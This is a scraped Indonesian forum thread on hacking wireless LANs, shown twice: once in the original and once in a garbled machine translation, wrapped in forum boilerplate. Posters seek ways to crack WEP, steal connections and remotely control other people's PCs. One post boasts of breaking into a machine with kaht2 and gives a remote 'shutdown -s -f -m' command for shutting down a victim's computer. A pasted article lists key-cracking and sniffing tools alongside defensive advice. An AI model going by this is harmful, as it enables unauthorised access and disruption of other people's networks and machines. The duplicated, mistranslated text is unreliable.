Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt
C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.
Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a
C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*
sebelah nama pc itu adalah port yang digunakan untuk hubungan .
netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.
C:\WINDOWS\System32>netstat -a
Active Connections
Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .
Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng
atau kalo mau iseng sebentar coba nigh pake rumus ini
Quote
cari taw host name si computer tujuan.. pake angry scan juga bisa.
habis itu ketik deh di command prompt misalnya :
c:/shutdown -s -f -m \\abcd -t 20
habis tu dalam 20 detik, computer client akan shutdown.. keke... :'(
--------------------------------------------------------------------------------
E2140 @3,2 GHz|MOBO Biostar 945G Micro 775SE Ext|A-Data 2x1Gb 800 PC6400|DVD RW
LiteOn|HIS X700Pro IceQ 256/128MB PCIe|LG LCD monitor 21"
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
arwan
Trade Count: (0)
Interest..
Posting Quality: -1
Offline
View Inventory
Send Money to arwan
--------------------------------------------------------------------------------
lho mas kalo remote system komputer korban nya ga diaktifin kan ga bisa di shutdown korbannya
dengan perintah C:\shutdown .... cmiiw
yup,ethereal berfungsi membaca (baca:capture) pesan atau data yang mengalir pada jaringan,
sehingga aliran data yang aktif bisa terlihat, apa saja yang dibuka, data apa yang dikirimkan apakah
email,friendster atau semacamnya,tapi tampaknya belum bisa untuk data yang melewati https atau
secure socket layer, betulkan bila saya salah
arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 2
Offline
View Inventory
Send Money to arbangun
aRB'S Coorp
Anyone interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities
will need a good set of base tools with which to work. Fortunately, there are an abundance of free
tools available on the Internet. This list is not meant to be comprehensive in nature but rather to
provide some general guidance on recommended tools to build your toolkit.
Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being
broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login
Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and/or encryption, you may need one of the following tools.
Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.
Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.
Ethereal – While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.
The aforementioned utilities, or similar ones, will be necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.
Just as it’s important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.
NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.
Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure
your WLAN is protected by using advanced Authentication and Encryption
Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).
Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of residing in a dictionary file that would be used to try and guess your key and/or would
take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to
protect the authentication and limit the amount of incorrect guesses that would take place before the
account is locked-out. If using certificate-like functionality, it could also validate the remote system
trying to gain access to the WLAN and not allow a rogue system access.
ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.
Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Logged
jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #15 on: April 16, 2007, 10:42:34 PM »
--------------------------------------------------------------------------------
Ato pke cara fuzzing
Yg ini lebih santai, lebih "sopan"..
Yg jelas gak cmn berguna buat WLAN doang..
Logged
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
kalo yang MAC adress, bukannya ada tuh software buat ganti MAC adress??
ada yang pernah coba blom?kan enak tu kalo bisa diganti, bisa berjam-jam akses gratis....hehee
kalo ndak salah, dulu saya juga pernah mbaca artikel sejenis. ya kabelnya kan diikat ke antena
WLAN. gak tau deh, kalo WLAN yang gak pake antena bisa apa ndak.jadi bukan pake usb,
serial.kalo ndak salah kan diameter kalengnya juga harus disesuaikan to?
Logged
Panji
[Here To Help]
[ SupeR ADMIN ]
Trade Count: (2)
[ HYPER ]
Posting Quality: 72
Offline
--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!
Logged
--------------------------------------------------------------------------------
just trying to serve You...
You are not allowed to view images.
Please register or login
work as hard as U can.. and .. be as simple as U can, to be part of Others!
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #18 on: April 19, 2007, 03:19:49 PM »
--------------------------------------------------------------------------------
WEP Crack bisa anda baca di HyperMedia Magazine edisi 2.
Logged
still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
--------------------------------------------------------------------------------
bro semua, mo nanya nih, kalo lewat cain and abel dah dapet ip adress, port, ama SSID, trus gimana
biar bisa nge-remote komputer tujuan??
Logged
aghya
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 0
Offline
View Inventory
Send Money to aghya
--------------------------------------------------------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!
Logged
--------------------------------------------------------------------------------
Venice 3000+ @2600 (daily)..so far
DFI LP UT NF4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa Geforce 6600 GT
Samsung SATA 80
EXtreme 500
inou
nubi all the time... :D
[ Community Member ]
Trade Count: (2)
[ EXTREME ]
Posting Quality: 1
Offline
View Inventory
Send Money to inou
--------------------------------------------------------------------------------
halow sadayana,ada yg punya AirPcap yg full ndak?bagi donk
Logged
--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
OFFICIAL TEAM:
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or loginYou are not allowed to view images.
Please register or login
@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]
Posting Quality: -11
Offline
View Inventory
Send Money to @5ph@lt
--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!
Logged
--------------------------------------------------------------------------------
Sempron LE1150 I Abit NF-M2S I Elixir DDR2 667 1Gx2 I WDC 40GB I Seagate 120GB I BenQ
DW2000 I Simbokde 500W PPFC I Thermaltake iFlash 120mm I Compaq S510 15"
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
1b3l_jubel
Trade Count: (0)
Interest..
Posting Quality: -1
Offline
--------------------------------------------------------------------------------
tak coba dah.......
Logged
@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]
View Inventory
Send Money to @5ph@lt
--------------------------------------------------------------------------------
hyem ga jadi keluarin distro ya?
Logged
GoogleTagged: netstat socket windows abit merubah wireshark kampus source enkripsi address
online hak org clien kita apa coding tool netview sofware
« previous next »
Jump to: Please select a destination: ----------------------------- == T H E - C O R E == [OFFICIAL
BOARD] ----------------------------- => Official FAQ, Rules, & Forum Guide => Official Event =>
Official Folding/Grid Team [Hyper-GRID] => Official Merchandise => REVIEW ===> Mainboard
Review ===> Memory Review ===> Display Card Review ===> CPU Review ===> Pheriperal
Review ===> Software Review ===> Games Review => News & Live Chat Discuss ! ===>
Hardware News & Articles ===> Software News & Articles ===> Games News & Articles =>
Online Store & Pricelist (JUST ENABLED ;) ) ===> Intel System ===> AMD System ===> |
HYEM PURWOREJO | ===> | HYEM PALEMBANG | ----------------------------- == HYPER
X-3ME [ADVANCED & SPECIALIST] == |only in English| ----------------------------- => =
WORLD RECORD ADICT = => =| X-3ME Suicide Overclocking Championship |= ===> SuperPi
Team ===> Sisoftsandra Team ===> PC Mark Team ===> 3DMark Team ===> Aquamark Team
===> Mainboard Moding ----------------------------- == H A R D W A R E==
----------------------------- => Basic System Troubleshooting, PC System & Overclocking Guide =>
PC Modding => Processor ===> AMD ===> INTEL => Mainboard ===> Abit => Memory ===>
ADATA => Power Supply ===> FSP => Display Card ===> POV => Optical & Storages =>
Cooling => Sound & Speaker Devices => Pheriperal & Network => Notebook & PDA
----------------------------- == S O F T W A R E== ----------------------------- => Games ===> Games
F.A.Q. ===> Game Cheat & Trainer ===> Multiplayer Game => Operating System ===> Windows
===> Linux ===> Macintosh => Programing => Security => Audio Freak => Webmastering => 2D
Designer and Animation [FOTO-VIDEO] => 3D Modelling and Animation => Other Importance
Software ===> BIOS & ROM ===> Driver ===> Overclocking Tools ----------------------------- ==
ADD-ON BOARD == ----------------------------- => HOBBY ===> Angkringan Ruwet x2 ===>
Angkringan Ngakak
Permissions
The Unordinary
Enter your search terms
Web hyem.org
Submit search form
| LCD 15.6 "+ Key + Mouse = Rp. 950rb | LCD 19" + Key + Laser Mouse = Rp.1.300rb | LCD 16
"+ Key + Mouse = Rp. 990rb |
Palit HD4870
Palit HD4870 Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases
is still 256bit graphics lbh dr 5770 128bit superior, let alone reply we see from the price /
performancenya)
PROMO: $ 150
Palit HD4850
Palit HD4830 DDR3, 512MB, 256bit, Core: 575 / Mem: 1800Mhz + HDMI
Youngest brother of the family RV770, Still be the Price / Performance King!
PROMO: $ 90
With DDR3, High-end card is legendary high-end display card under $ 100, especially for high-
OC .. This babe is the Most Value King!
PROMO: $ 78, 512M: $ 65
ALL AVAILAVBE
Chat Now!
[more]
Last 20 Shouts:
-------------------------------------------------- ------------------------------
Panji
Today at 01:44:28 AM
Good for Hendy hyem .. lu ganyangka win bro ..
an35
Today at 12:50:18 AM
let kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
quiet mas dab ...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do that 'an: p
B.U.G.S
Yesterday at 05:05:04 PM
@ Tito Haga
nge's iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED .. MOMED marai ngunu
wae .. wakakaka ..
coolwin
Yesterday at 04:58:26 PM
BEST UPDATE CHECK today CF KILL !!!!! I'M IN RANK 2 wakakakakaka
Tito Haga
Yesterday at 02:51:11 PM
@ BUGS
hahahaha ... .. bar Tangi sori2 turu ngono kui ngemoved yes ... haha
donkey
Yesterday at 01:57:41 PM
wakakakaka ....
blackshield ™
Yesterday at 11:54:06 PM
cilukkkkkkkk
baaaaaaa ...
B.U.G.S
Yesterday at 10:39:35 PM
Jove, moved ming kok isine kabeh kie ..? nek nge-mending move topic lawas not dikei redirection
ga kang ..
Tito Haga
Yesterday at 08:26:27 PM
wakakakakka ... means the same boat
sadnux
Yesterday at 08:20:42 PM
its not about bersih2, tp itu lho yg in sign writing about college yg
parent often say kek gitu pas kl ane marahin T_T
Tito Haga
Yesterday at 08:13:04 PM
Hahahahaha ... yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah::
sadnux
Yesterday at 08:09:47 PM
beautiful morning .. tp yg ketendang same directly pack signaturenya ditto
wakakakak
Tito Haga
Yesterday at 07:56:09 PM
morning kang
sadnux
Yesterday at 07:47:53 PM
met pagi all
Tito Haga
Yesterday at 06:34:29 PM
weh ... kang banner onlen
Panji
Yesterday at 06:13:51 PM
miss u all ...
Tito Haga
Yesterday at 05:30:56 PM
Ndalu gang
Polling
Lates Post
Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
EXPLANATION PLEASE wearing ... by botaxalim [Today at 01:54:06 AM]
Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
[ASK] Building Network by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot ... by Hazzan [Today at 12:24:06 AM]
guitar hero pc pake maen ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] 915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 PM]
Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM]
[review] HaPe Modem "ray ... by frozr_man [Yesterday at 05:08:18 PM]
AMD VS INTEL <FIGHT! > By didit_catro '[Yesterday at 04:15:54 PM]
[Ask About] proci Warranty ... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] How to mbungkam Fan B. .. by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10,884
Latest: Ricko
Stats
Total Posts: 102,876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP
berang_berang
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to berang_berang
Topic starter
-------------------------------------------------- ------------------------------
Kalo we want to hack the standard w.LAN tools2 what we wrote butuhin, and how gmana?
Trus kalo yg pake linux tools recommended what? kalo windows what?
Kalo mau nyolong gmana Internet connection?
Logged
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 1 on: March 13, 2006, 01:02:12 PM»
-------------------------------------------------- ------------------------------
kismet for netstumbler & nyari AP or SSID yg buat airsnort active & ngecrack password ...
manual installation & tutorial googling aja. Jgn lupa kalo successful password share ...........
Logged
-------------------------------------------------- ------------------------------
Logged
RooTrick
[Community Member]
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to RooTrick
-------------------------------------------------- ------------------------------
download dmn tuh om?
trus kalo uda dapet makes source code applications na na gmn?
thx bgt ...
: mrgreen:
Logged
-------------------------------------------------- ------------------------------
Let the world revolves around me ...
densinyo
[Community Member]
Trade Count: (0)
[Enthusiast]
Posting Quality: 0
Offline
View Inventory
Send Money to densinyo
-------------------------------------------------- ------------------------------
DL dmn tuh ... boleh dong requested the link ...
Logged
-------------------------------------------------- ------------------------------
T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC 500GB! Pioneer DVD RW!
Lite-On DVD! A4Tech
-=- environment ranging from self-=-
081-5612-7812
-------------------------------------------------- ------------------------------
Logged
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 4 on: March 21, 2006, 03:09:47 PM»
-------------------------------------------------- ------------------------------
I have lg nih project, make antenna can make WiFinya YKPN shoot, there have any experience yg
ga tin bkin antenna?
Search tool material n ada yg tau ga?
This tutorial is reply pd sdikit interest:
You are not allowed to view links.
Register or Login
Logged
MAS
[OprekPC]
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to MAS
-------------------------------------------------- ------------------------------
This follow aja deh ... You are not allowed to view links.
Register or Login sdh was too old Linux (Auditor following sdh n dah find her hard to replace
Backtrack) tp sure deh, klo you are able to implement, easy wuiiih banged.
one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here
klo for windows, in addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman
make WEP) tp klo dah target MAC auth make it give up deh mas ... hehehe, before there isa yg
Logged
-------------------------------------------------- ------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Mods - Tweak - Overclock PC
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
gini bro, I'm on campus pake pake internet.tp facility via pc connected via LAN. trus time ta 'clay
found in the network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta 'type "net view"
out tu laptop2nya. can ta 'not hacked from the pc I pake?
thanks ya ... (just curious, do not want to harm everybody)
Logged
psyCHo_L061c
Trade Count: (0)
Posting Quality: 0
Offline
-------------------------------------------------- ------------------------------
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie
Logged
The Unordinary Community Re: Hacking Wireless LAN!
«Reply # 8: January 26, 2007, 08:04:29 PM»
-------------------------------------------------- ------------------------------
Order: hyem_toko
Logged
silverx
Trade Count: (0)
[Enthusiast]
Posting Quality: 1
Offline
View Inventory
Send Money to silverx
-------------------------------------------------- ------------------------------
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
network, although worgroupnya different ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1
Logged
-------------------------------------------------- ------------------------------
"Have Something In Need, Not according Desire "....
Arwan
Trade Count: (0)
Interest ..
Posting Quality: -1
Offline
View Inventory
Send Money to Arwan
-------------------------------------------------- ------------------------------
Netstumbler, Kismet, and Aeroneet / aeropeek
aeropeek can open either AP WEP WPA reply ... (not nyoba)
ASCII is usually encrypted so we look for similarities alone ... and may be divided into 4 atao like
ASCII codenya'll see ...
This can also be used for the man in the middle attack
There is no reply aeropeek MBO software I shared ... my software got damaged jeefo, and it is the
master .... kalo download more males (trial)
cmiiw
Logged
-------------------------------------------------- ------------------------------
i have my own journey
lelahana
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to lelahana
-------------------------------------------------- ------------------------------
sadisssssss ....
wah .... kckckckckckc linings semuanyajago ..
but the reply requested diajarin way, there are going ga?
jadi pengen nih ... curious buanget ga tau .... but how ...
ajarin dunks .. : '(:' (: '(:' (: '(:' (
Logged
arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]
Quality posts: 2
Offline
View Inventory
Send Money to arbangun
ARB'S Coorp
-------------------------------------------------- ------------------------------
NUAMBAAAHHIIINN ... waaakaaakaa .....
tu pake tool, klo ga slh we can pass ama dpet username for log-on.
hmmm ya no more for a computer intruder detection can try jg nih pake this way
Quote
== MENDITEKSI NETWORK THROUGH intruder DOS ==
BEGIN
It turned out there at Dos facility that may we all forgotten and rarely used
command is NETSTAT. Windows provides this command to support
network. Netstat can also be used to see the ip-ip that are connected
into our computer.
For that open the dos command you, you know how: d if ga tau nich:
- Start> Run> command.exe [for Win 95/98]
- Start> Run> cmd.exe [for a win 2000/XP / nt]
then the command prompt appear deh
C: \ WINNT> netstat?
Displays protocol statistics and current TCP / IP network connections.
Now we use netstat to see the connections that are connected using-a
C: \ WINNT> netstat-a
Proto Local Address Foreign Address State
TCP me: http me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: https me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: microsoft-ds me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1025 me.ladomain.lintasarta.co.id: 0 LISTENING
Actually there's more fasilitas2 dos that can be used for fun
Quote
taw for the host name of the destination computer .. pake scans can also be angry.
deh after that type in the command prompt eg:
c: / shutdown-s-f-m \ \ abcd-t 20
tu gone in 20 seconds, the client computer will shutdown .. violence ... : '(
-------------------------------------------------- ------------------------------
E2140 @ 3.2 Ghz | Mobo Biostar 945G Micro 775SE Ext | A-Data 2x1GB 800 PC6400 | LiteOn
DVD-RW | HIS X700Pro IceQ 256/128MB PCIe | LG LCD monitors 21 "
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
Arwan
Trade Count: (0)
Interest ..
Posting Quality: -1
Offline
View Inventory
Send Money to Arwan
-------------------------------------------------- ------------------------------
lho kalo mas remote computer system of his victim's ga ga diaktifin can shutdown the victim with
the command C: \ shutdown .... cmiiw
yup, ethereal function read (read: capture) a message or data that flows on the network, so the
current data flow can be seen, what is opened, what data is sent if the email, myspace or something,
but can not seem to pass data https or secure socket layer, fix if I'm wrong
arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]
Quality posts: 2
Offline
View Inventory
Send Money to arbangun
ARB'S Coorp
-------------------------------------------------- ------------------------------
More from yesterday ..... ADDITIONAL PAKE PInter BIAR BHS. ENGGRIS YES ...
Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:
Network stumbler aka NetStumbler - This Windows based tool easily finds wireless signals being
broadcast within range - A must have. It also has ability to determine Signal / Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login
Airsnort - This is a very easy to use tool that can be used to Sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you'll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.
Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.
Ethereal - While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to Sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to Sniff-out non-broadcast SSIDs.
The aforementioned utilities, or similar ones, will be Necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.
Just as it's important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.
NetStumbler - Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.
Kismet - There's really nothing you can do to stop Kismet from finding your WLAN, so Ensure
your WLAN is protected by using advanced Authentication and Encryption
Airsnort - Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).
Cowpatty - Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of Residing in a dictionary file that would used to be try and guess your key and / or would
take longer. If in a corporate scenario, do not use WPA with Pre-Shared Key, use a good EAP type
to protect the authentication and limit the amount of incorrect guesses that would take place before
the account is locked-out. If using certificate-like functionality, it could also validate the remote
system trying to gain access to the WLAN and not allow a rogue system access.
ASLeap - Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.
Ethereal - Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Logged
Jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 15 on: April 16, 2007, 10:42:34 PM»
-------------------------------------------------- ------------------------------
Ato okay how fuzzing
This reply is more relaxed, more 'polite' ..
Yg cmn clearly not useful for WLAN doang ..
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
kalo the MAC address, instead of a software tuh make change MAC address?
anyone ever tried blom? a good tu be replaced kalo, can be many hours free access .... hehee
kalo ndak wrong, I had also been mbaca similar articles. yes the cord tied to a WLAN antenna. gak
tau deh, kalo gak pake WLAN antenna can be anything ndak.jadi not pake usb, serial.kalo ndak a
diameter of the can also be adjusted to?
Logged
Panji
[Here To Help]
[Super Admin]
Trade Count: (2)
[Hyper]
Posting Quality: 72
Offline
-------------------------------------------------- ------------------------------
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!
Logged
-------------------------------------------------- ------------------------------
just trying to serve You ...
You are not allowed to view images.
Please register or login
work as hard as u can .. and .. be as simple as u can, to be part of Others!
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 18 on: April 19, 2007, 03:19:49 PM»
-------------------------------------------------- ------------------------------
Crack WEP can be read at the 2nd edition HyperMedia Magazine.
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
bro all, mo nanya nih, kalo through Cain and abel dah dapet ip address, port, ama SSID, trus gimana
biar bisa nge-purpose remote computer?
Logged
aghya
[Community Member]
Trade Count: (0)
[Enthusiast]
Posting Quality: 0
Offline
View Inventory
Send Money to aghya
-------------------------------------------------- ------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!
